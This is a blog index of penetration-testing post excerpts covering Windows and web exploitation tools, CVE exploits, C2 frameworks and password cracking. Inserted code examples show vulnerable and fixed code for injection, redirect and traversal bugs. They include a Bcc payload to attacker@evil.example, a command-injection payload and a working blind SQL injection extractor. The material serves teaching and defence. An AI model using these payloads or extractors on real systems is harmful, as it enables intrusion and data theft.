Impacket Remote code execution (RCE) on Windows from Linux

Impacket is a collection of Python classes and functions for working with various Windows network protocols. It is a centerpiece of many pentesting tools. Impacket can work with plain, NTLM and Kerberos authentication, fully supporting pass-the-hash (PtH) attacks and more. https://github.com/SecureAuthCorp/impacket Method / Port used: psexec.py tcp/445; dcomexec.py tcp/135, tcp/445, Read more…

SMB server with Impacket-smbserver

This time we will set up an SMB server to run scripts from, using impacket-smbserver https://github.com/SecureAuthCorp/impacket Download 1. Download the scripts git clone https://github.com/SecureAuthCorp/impacket.git 2. Locate the smbserver script find . -iname '*smbserver*' 2> /dev/null Note: I already have it installed in my Kali machine How to 1. In your Linux Read more…

Connect to Windows Remote Management (WinRM) using Evil WinRM

Windows Remote Management (WinRM) is the Microsoft implementation of the WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems from different vendors to interoperate. https://docs.microsoft.com/en-us/windows/win32/winrm/portal The winrm command-line tool is used for the following tasks: Remotely communicate and interface with hosts Read more…

WinPEAS – Windows Enum

WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. This write-up covers how to run it and complete post-exploitation activities. How to 1. Download the script from GitHub (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git cd privilege-escalation-awesome-scripts-suite 2. Navigate through the directories to find the binary Read more…

Kerberos Service Principal Name (SPN) Lab

Having already set up Active Directory as per (https://vk9-sec.com/active-directory-dns-lab/), we can register an SPN for a test service. Kerberos authentication requires both of the following conditions to be true: The client and server computers must be part of the same Windows domain, or in trusted domains. A Service Read more…

Exploiting mRemoteNG

mRemoteNG (mremote) is an open source project (https://github.com/rmcardle/mRemoteNG) that provides a full-featured, multi-tab remote connections manager. It currently supports RDP, SSH, Telnet, VNC, ICA, HTTP/S, rlogin, and raw socket connections. It also provides the means to save connection settings such as hostnames, IP addresses, protocol, port, and user credentials, Read more…

How to enumerate Windows using JAWS

JAWS is a PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so it ‘should’ run on every Windows version since Windows 7. https://github.com/411Hall/JAWS How to 1. Download the script git clone https://github.com/411Hall/JAWS.git cd JAWS ls 2. Read more…

ColdFusion 8 FCKeditor CurrentFolder directory traversal / File Upload / RCE – CVE-2009-2265

Multiple vendor applications that utilize FCKeditor could allow a remote attacker to traverse directories on the system and upload arbitrary files. A remote attacker could exploit this vulnerability using directory traversal sequences in the CurrentFolder parameter to several connector modules to view arbitrary files or upload malicious executable files on Read more…

Drupal 7.x Module Services – Remote Code Execution

The Drupal 7.x Services module makes insecure use of unserialize(). Exploiting the vulnerability allows privilege escalation, SQL injection and, finally, remote code execution. (https://www.ambionics.io/blog/drupal-services-module-rce) We will use the Exploit-DB code to exploit this vulnerability. (https://www.exploit-db.com/exploits/41564) Exploit 1. Determine the version of Drupal. For this we can access CHANGELOG.txt from the Read more…

Droopescan – How to use

A plugin-based scanner that aids security researchers in identifying issues with several CMS platforms. (https://github.com/droope/droopescan) Supported CMS are: SilverStripe, WordPress, Drupal. Partial functionality for: Joomla (version enumeration and interesting URLs only), Moodle (plugin & theme very limited, watch out). How to use 1. Download the application git clone https://github.com/droope/droopescan.git cd droopescan Read more…

Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) - CVE-2016-0099

Microsoft Windows could allow a local authenticated attacker to gain elevated privileges on the system, caused by improper sanitization of handles in memory by the Secondary Logon Service. By executing a specially-crafted program, an authenticated attacker could exploit this vulnerability to execute arbitrary code as an administrator and take control Read more…

Sherlock – Find missing Windows patches for Local Privilege Escalation

Sherlock is a PowerShell script used for privilege escalation, quickly finding missing patches on the system. (https://github.com/rasta-mouse/Sherlock) Currently looks for:
MS10-015 : User Mode to Ring (KiTrap0D)
MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference Read more…

WordPress Plugin: Plainview Activity Monitor – (Authenticated) Command Injection – CVE-2018-15877

Plainview Activity Monitor plugin for WordPress could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a specially-crafted request, an attacker could exploit this vulnerability using shell metacharacters in the ip parameter to inject and execute arbitrary OS commands on the system. The Plainview Activity Read more…

Linux Restricted Shell Bypass

Restricted shells are conceptually shells with restricted permissions, with features and commands working under a very peculiar environment, built to keep users in a secure and controlled environment, allowing them just the minimum necessary to perform their daily operations. Once hackers get a low-privileged shell, even a restricted one, Read more…

Fcrackzip – BruteForce ZIP protected files

fcrackzip is a third-party tool for cracking the passwords of zip files. It tries to brute-force them using a list of passwords. Installation sudo apt install fcrackzip Before using fcrackzip we need a password-protected zip file. zip --password <password> <filename.zip> <data> zip --password vk9security new_file.zip data.txt How to use 1. Show help Read more…

BufferOverflow lab 3: Panel app (Linux)

This lab is intended to demonstrate how to exploit a BoF on Linux. The vulnerable application is Panel, which can be downloaded from a VulnHub machine (https://www.vulnhub.com/entry/pinkys-palace-v2,229/). The executable can be found at (https://github.com/vry4n/BoF-Panel-Linux) This application is a custom app that runs on port 31337 & it is vulnerable to Buffer Read more…

Ssh2john how to

Ssh2john is part of the John the Ripper suite. It is a script that transforms [RSA/DSA/EC/OPENSSH (SSH private keys)] private keys into John's hash format for later cracking with JtR How to 1. Having an RSA private key already cat id_rsa 2. Locate the ssh2john script using find find / Read more…

How to use WPScan

WPScan is an open source WordPress security scanner. You can use it to scan your WordPress website for known vulnerabilities within the WordPress core, as well as popular WordPress plugins and themes. This tool is available at: https://github.com/wpscanteam/wpscan, this comes installed in most security distributions. How to use 1. Display Read more…

Chkrootkit 0.49 – Local Privilege Escalation – CVE-2014-0476

chkrootkit is a tool to locally check for signs of a rootkit (http://www.chkrootkit.org/). It contains: chkrootkit: a shell script that checks system binaries for rootkit modification. ifpromisc.c: checks if the network interface is in promiscuous mode. chklastlog.c: checks for lastlog deletions. chkwtmp.c: checks for wtmp deletions. check_wtmpx.c: checks for wtmpx Read more…

Exploiting pChart 2.1.3 (Directory traversal & XSS)

PHP library pChart 2.1.3 (and possibly previous versions) by default contains an examples folder, where the application is vulnerable to Directory Traversal and Cross-Site Scripting (XSS). This has been taken from (https://www.exploit-db.com/exploits/31173) Exploiting Directory Traversal 1. Visiting the application at (http://192.168.0.18/pChart2.1.3/examples/index.php), we get to the examples folder. 2. This tool Read more…

Installing Splunk (Linux)

Splunk is a software platform to search, analyze and visualize the machine-generated data gathered from the websites, applications, sensors, devices etc. that make up your IT infrastructure and business. Mainly Splunk does these things: ingests data; parses, indexes and stores data; runs searches on indexed data. For more info visit: Read more…

Domain info using Robtex

Robtex is a service which gathers public information about IP addresses, domain names, host names, Autonomous Systems, and more. How to use 1. Access https://www.robtex.com/dns-lookup and search for the domain 2. In the results we can find: Analysis, DNS servers, Mail servers, IP address, Quick Info, FQDN, DNS servers, Records Read more…

How to use whois

Information gathering is the first step of ethical hacking, where the penetration tester (or attacker) gathers information on the target. To increase your chances of a “successful” engagement, you will need to do a good job and spend time on this stage. There are a couple of information Read more…

BufferOverflow lab 2: MiniShare

This time we’ll exploit MiniShare 1.4.1. This is an HTTP file-sharing server that listens on port 80; you can share files and users can download them from the site. I uploaded the application to GitHub (https://github.com/vry4n/BoF-MiniShare-1.4.1) Lab details Windows XP x86 (192.168.0.5) Immunity Debugger MiniShare 1.4.1 Kali (192.168.0.20) Read more…

BufferOverflow lab 1: FreeFloat FTP Server

This lab is intended to demonstrate how to exploit BoF in Windows. The vulnerable application is FreeFloat which can be downloaded from (https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip). The Freefloat FTP Server has many vulnerable parameters, which can be useful to practice on, and we will choose one of them here to do a full Read more…

How to use Veil to create payloads

Veil is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions. Installation 1. Run the commands below and wait for the installation to complete sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git cd Veil/ ./config/setup.sh --force --silent 2. Upon completion, you can run the application with the command Read more…

Active Directory & DNS Lab

This time we will configure basic AD and DNS functionality. The terms object, organizational unit, domain, tree, and forest are used to describe the way Active Directory organizes its directory data. Like all directories, Active Directory is essentially a database management system. The Active Directory database is where the individual Read more…

How to Set up & Use C2 PoshC2

PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes Read more…

How to Set up & Use C2 Sliver

Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) Read more…

How to Set up & Use C2 Empire

Empire 3 is a post-exploitation framework that includes a pure-PowerShell Windows agent, and compatibility with Python 3.x Linux/OS X agents. It is the merger of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptographically secure communications and a flexible architecture. Documentation GitHub: https://github.com/BC-SECURITY/Empire Client: https://github.com/BC-SECURITY/Starkiller Installation Server 1. Download Read more…

How to Set up & Use C2 Silent Trinity

SILENTTRINITY is a modern, asynchronous, multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NET's DLR. It’s the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs, a technique the author coined as BYOI (Bring Your Own Interpreter). The aim Read more…

Hardening SMB

Server Message Block (SMB) is a networking file share protocol included in Windows workstation and Windows server that provides the ability to read and write files and perform other service requests to network devices on a share. Windows supports file and printer sharing traffic by using the Server Message Block Read more…

SMTP Injection attack

Mail Command Injection is an attack technique used to exploit mail servers and webmail applications that construct IMAP/SMTP statements from user-supplied input that is not properly sanitized. SMTP injection, specifically, injects attacker-controlled SMTP commands into the data transmitted from an application (typically a web application) to an SMTP server Read more…
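The most common form of this in a web application is header injection: a form field is written straight into a mail header, so a CR/LF inside the value ends that header and starts a new one (for example a Bcc: line). The following is an added example, not code from the original post: a constructed message builder in its vulnerable and hardened forms, plus a parser that lists every address the MTA would deliver to. The message layout, addresses and the INJECTED_SUBJECT payload are all assumptions made for the demonstration.

```python
from email.parser import Parser


def build_message_vulnerable(to_addr: str, subject: str, body: str) -> str:
    """Vulnerable: header values from the web form are dropped straight into the
    raw message. A CR/LF inside 'subject' ends that header and starts a new one."""
    return f"To: {to_addr}\r\nSubject: {subject}\r\n\r\n{body}\r\n"


def build_message_hardened(to_addr: str, subject: str, body: str) -> str:
    """Hardened: refuse any header value containing CR or LF (the only way to
    start a new header line), then assemble the message exactly as before."""
    for name, value in (("To", to_addr), ("Subject", subject)):
        if "\r" in value or "\n" in value:
            raise ValueError(f"CR/LF in {name} header rejected: {value!r}")
    return f"To: {to_addr}\r\nSubject: {subject}\r\n\r\n{body}\r\n"


def recipients(raw_message: str) -> list:
    """Parse the raw message the way the MTA would and list every address it
    will deliver to (To, Cc and Bcc headers)."""
    msg = Parser().parsestr(raw_message)
    found = []
    for field in ("To", "Cc", "Bcc"):
        for value in msg.get_all(field, []):
            found.extend(addr.strip() for addr in value.split(","))
    return found


# Constructed sample input: what an attacker types into the "subject" field.
INJECTED_SUBJECT = "Order confirmation\r\nBcc: attacker@evil.example"
```

Rejecting CR/LF outright is preferable to stripping them, because stripping turns the attack into a silent data change and can still be bypassed by encodings the mail library decodes later.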

How to set up bWAPP – Linux

bWAPP, or a buggy web application, is a deliberately insecure web application. bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP is a PHP application that uses a MySQL database. It can be hosted on Linux and Windows. https://github.com/jehy-security/bwapp https://sourceforge.net/projects/bwapp/ Installation 1. Download the Read more…

Server-side HTTP Redirection

Server-side redirection vulnerabilities arise when an application takes user controllable input and incorporates it into a URL that it retrieves using a backend HTTP request. Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a Read more…
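The defence is to never redirect to a user-supplied URL unless it resolves to an allow-listed host or is an absolute-path-relative URL on the same site. The block below is an added example written for this page, not code from the original post; SITE_ORIGIN and ALLOWED_HOSTS are assumed values. It also covers the usual bypasses of a naive check: protocol-relative `//host`, backslashes (which browsers treat as slashes), `user@host` authority tricks, `javascript:` schemes and CR/LF in the value.

```python
from urllib.parse import urlsplit, urljoin

# Assumptions for this example: the application is served from SITE_ORIGIN and
# may only redirect users to these hosts.
SITE_ORIGIN = "https://www.example.com"
ALLOWED_HOSTS = {"www.example.com", "shop.example.com"}


def is_safe_redirect(target: str) -> bool:
    """True only for an absolute-path-relative URL on this site, or an http(s)
    URL whose host is on the allow-list."""
    if not target or any(c in target for c in "\r\n\t\x00"):
        return False                              # CR/LF would allow header injection
    normalized = target.replace("\\", "/")        # browsers treat '\' like '/'
    try:
        parts = urlsplit(normalized)
    except ValueError:                            # e.g. malformed IPv6 literal
        return False
    if parts.netloc:                              # absolute or protocol-relative (//host)
        return (parts.scheme in ("http", "https")
                and (parts.hostname or "").lower() in ALLOWED_HOSTS)
    # No authority part: require a path that starts with '/' and no scheme
    # such as javascript: or data:
    return not parts.scheme and normalized.startswith("/")


def resolve_redirect(target: str, fallback: str = "/") -> str:
    """Value the application should place in the Location header."""
    if not is_safe_redirect(target):
        return urljoin(SITE_ORIGIN, fallback)
    return urljoin(SITE_ORIGIN, target.replace("\\", "/"))
```

Note that `urlsplit` puts the `@`-separated user-info into `netloc`, so `https://www.example.com@evil.example/` correctly yields the hostname `evil.example`; comparing `hostname` rather than `netloc` is what makes that case fail the allow-list.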

Cracking Password John The Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS (the latter requires a contributed patch). Its primary purpose is to detect weak passwords. It is one of the most popular password testing and breaking programs as it combines Read more…

Basics of Path Traversal

Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files. In some cases, an attacker Read more…
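The typical root cause is a file name from the request joined onto a base directory with no check that the result stays inside it. Below is an added example, not code from the original post: a vulnerable reader next to a hardened one that canonicalises the final path and requires it to remain under the canonical base directory, run against a throwaway web root with constructed sample files. The directory layout and file contents are assumptions for the demonstration.

```python
import os
import tempfile


def vulnerable_read(base_dir: str, filename: str) -> bytes:
    """Vulnerable: the user-supplied name is joined onto the base directory with no
    check, so '../' sequences escape base_dir. An absolute filename is worse still:
    os.path.join() simply discards base_dir when the second argument is absolute."""
    with open(os.path.join(base_dir, filename), "rb") as fh:
        return fh.read()


def safe_read(base_dir: str, filename: str) -> bytes:
    """Hardened: resolve the final path (following symlinks) and require that it
    still lies inside the canonical base directory before opening it."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"traversal attempt rejected: {filename!r}")
    with open(target, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Build a throwaway web root (constructed sample data) and exercise both
    readers with a normal request and two traversal attempts."""
    root = tempfile.mkdtemp(prefix="webroot-")
    images = os.path.join(root, "images")
    os.mkdir(images)
    with open(os.path.join(images, "cat.png"), "wb") as fh:
        fh.write(b"\x89PNG fake image bytes")
    secret = os.path.join(root, "secret.txt")        # outside the images directory
    with open(secret, "wb") as fh:
        fh.write(b"db_password=hunter2")

    results = {
        "normal": safe_read(images, "cat.png"),
        "vulnerable_relative": vulnerable_read(images, "../secret.txt"),
        "vulnerable_absolute": vulnerable_read(images, secret),
    }
    for name, attempt in (("safe_relative", "../secret.txt"),
                          ("safe_absolute", secret)):
        try:
            safe_read(images, attempt)
            results[name] = "LEAKED"
        except PermissionError:
            results[name] = "blocked"
    return results
```

Checking the resolved path rather than filtering `../` substrings is what defeats the usual bypasses (URL-encoded dots, `....//`, absolute paths and symlinks), because the check happens on what the OS will actually open.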

Basic Command injection

Command injection is one of the OWASP Top 10 vulnerability categories. It is an attack in which arbitrary commands of the host OS are executed through a vulnerable application. The attack is possible when a web application passes unsafe user data to a system shell function within the running script. This user Read more…
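The classic case is a status page that runs `ping` against a hostname taken from the request by building a command string for the shell. The following is an added example, not code from the original post: the vulnerable pattern, the hardened version (allow-list validation plus an argument list so no shell parses the input), and the `shlex.quote()` fallback for when a shell really is needed. `echo` stands in for `ping -c 1` so that it runs without network, and the hostname pattern is an assumption for the demonstration.

```python
import re
import shlex
import subprocess

# Assumption for this example: only bare hostnames / IPv4 addresses are legitimate input.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})")


def vulnerable_lookup(host: str) -> str:
    """Vulnerable: the user value is concatenated into a string that /bin/sh parses.
    'echo' stands in for the 'ping -c 1' a real status page would run; the
    injection mechanics are identical, metacharacters such as ';' reach the shell."""
    completed = subprocess.run("echo pinging " + host, shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def hardened_lookup(host: str) -> str:
    """Hardened: allow-list validation first, then an argument list (no shell) so
    the value can only ever be a single argv entry of the child process."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected host: {host!r}")
    completed = subprocess.run(["echo", "pinging", host],
                               capture_output=True, text=True)
    return completed.stdout


def quoted_shell_lookup(host: str) -> str:
    """If a shell is unavoidable (pipes, globbing), shlex.quote() turns the value
    into one literal word. Still weaker than hardened_lookup: nothing limits what
    that single argument contains, so pair it with validation in real code."""
    completed = subprocess.run("echo pinging " + shlex.quote(host), shell=True,
                               capture_output=True, text=True)
    return completed.stdout
```

Run it with a payload such as `127.0.0.1; echo INJECTED`: the vulnerable function prints a second line produced by the injected command, the hardened one rejects the value before anything executes, and the quoted variant echoes the whole payload back as inert text.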

How to set up Mutillidae – Linux

Mutillidae is a vulnerable framework where you can practice the OWASP Top 10, https://owasp.org/www-project-top-ten/ Download https://sourceforge.net/projects/mutillidae/ sudo git clone https://github.com/webpwnized/mutillidae.git 1. Install the required packages (in this case I’m using PHP 7.3) sudo apt-get install php7.3-curl php7.3-mbstring php7.3-xml Extra: show the PHP version php --version 2. Extract the Mutillidae content into /var/www/html Read more…

Introduction – Hacking with BeEF

BeEF (The Browser Exploitation Framework) uses YAML files to configure its core functionality as well as its extensions. Most of the core BeEF configuration is in the main configuration file, config.yaml, found in the BeEF directory. BeEF is a penetration testing tool that focuses Read more…

Hiding public IP – Anonsurf

Anonsurf uses Tor and iptables to anonymize the whole system. Anonsurf also gives users the capability of starting or stopping the I2P project. https://github.com/Und3rf10w/kali-anonsurf Installation 1. Download the files from GitHub git clone https://github.com/Und3rf10w/kali-anonsurf.git 2. Run the installer located in the download folder kali-anonsurf sudo bash installer.sh 3. Run the application after successful Read more…

Blind SQL injection

Blind SQL injection arises when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors. With blind SQL injection vulnerabilities, many techniques such as UNION attacks are not effective, because they rely Read more…
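What remains in a blind scenario is a one-bit oracle: the injected condition either changes the page or it does not. Asking enough yes/no questions recovers data one character at a time. The block below is an added example written for this page, not code from the original post. It simulates a vulnerable login page over an in-memory SQLite database (the table, the tracking-cookie injection point and the password `s3cr3t` are all constructed assumptions) and extracts the administrator password purely from the presence or absence of a "Welcome back" banner.

```python
import sqlite3
import string

# Constructed stand-in for a vulnerable application: an in-memory SQLite database
# whose page interpolates a cookie value straight into SQL and reveals nothing
# but a "Welcome back" banner (no query results, no database errors).
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
_conn.execute("INSERT INTO users VALUES ('administrator', 's3cr3t')")
_conn.commit()


def vulnerable_page(cookie_value: str) -> str:
    """Assumed vulnerable endpoint: the only visible effect of the query is
    whether the banner appears. Errors are swallowed, so nothing else leaks."""
    sql = f"SELECT 1 FROM users WHERE username = '{cookie_value}'"
    try:
        row = _conn.execute(sql).fetchone()
    except sqlite3.Error:
        return ""
    return "Welcome back" if row else ""


def oracle(condition: str) -> bool:
    """Ask one true/false question through the injection point. The trailing
    '--' comments out the application's closing quote."""
    payload = f"administrator' AND ({condition}) --"
    return "Welcome back" in vulnerable_page(payload)


def extract_password(target_user: str = "administrator") -> str:
    """Recover the password with boolean-based inference: first its length,
    then each character by comparing code points (no quoting needed)."""
    length = 0
    while not oracle(f"(SELECT length(password) FROM users "
                     f"WHERE username='{target_user}') = {length}"):
        length += 1
        if length > 64:
            raise RuntimeError("length probe failed")

    charset = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, length + 1):          # substr() is 1-indexed in SQLite
        for ch in charset:
            if oracle(f"(SELECT unicode(substr(password,{pos},1)) FROM users "
                      f"WHERE username='{target_user}') = {ord(ch)}"):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no character matched at position {pos}")
    return recovered
```

Against a real target the `oracle()` function would send the payload in the cookie over HTTP and inspect the response body; everything else stays the same. A linear scan of the charset is used for clarity; a binary search on the code point (`unicode(...) > N`) cuts the number of requests per character from dozens to about seven, which is what tools such as sqlmap do.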

SMTP lab (hMailServer)

This has been written to explain the steps to set up a basic insecure SMTP lab. We are using hMailServer as the mail server & Thunderbird as the mail client. https://www.hmailserver.com/ https://www.thunderbird.net/ Mail Server (hMailServer) 1. Start the wizard 2. Next, accept the license 3. Select the install folder, next Read more…